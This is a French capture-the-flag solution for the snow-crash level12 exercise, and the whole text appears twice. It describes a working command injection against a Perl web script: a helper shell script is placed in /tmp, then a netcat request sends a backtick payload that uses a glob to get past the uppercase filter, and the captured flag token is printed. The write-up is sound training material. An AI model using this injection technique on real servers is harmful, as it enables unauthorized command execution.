snow-crash/level12/Ressource/solution

# Il y a un script perl qui semble estre en mode serveur
# On peut lui envoyer 2 paramertre. Mais seul le premier semble etre unteressant
# le premeir parametre passe par 2 filtre.
# Le les caracter alphabetique en majuscule
# Le deuxieme suprime tout ce qu'il y a apres le premier espace
# En suite ce parametre et executer au sein d'une commande shell executier depuis du perl

# On ne poura donc pas executer de comande en tant que tel.
# mais on peut executer un fichier

# Dans un fichier /tmp/.TOTO ont va mettre le comptenue suivant:

	#!/bin/sh
	getflag > /tmp/.flag12 

# puis on envoie un requet avec des back-quote pour executer le fichier

$ nc -v localhost 4646
> GET /?x=`/*/.TOTO`

$ cat /tmp/.flag12
> Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
level12 2021-01-28 18:37:42 +00:00			`# Il y a un script perl qui semble estre en mode serveur`
			`# On peut lui envoyer 2 paramertre. Mais seul le premier semble etre unteressant`
			`# le premeir parametre passe par 2 filtre.`
			`# Le les caracter alphabetique en majuscule`
			`# Le deuxieme suprime tout ce qu'il y a apres le premier espace`
			`# En suite ce parametre et executer au sein d'une commande shell executier depuis du perl`

			`# On ne poura donc pas executer de comande en tant que tel.`
			`# mais on peut executer un fichier`

			`# Dans un fichier /tmp/.TOTO ont va mettre le comptenue suivant:`

			`#!/bin/sh`
			`getflag > /tmp/.flag12`

			`# puis on envoie un requet avec des back-quote pour executer le fichier`

			`$ nc -v localhost 4646`
			> GET /?x=`/*/.TOTO`

			`$ cat /tmp/.flag12`
			`> Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr`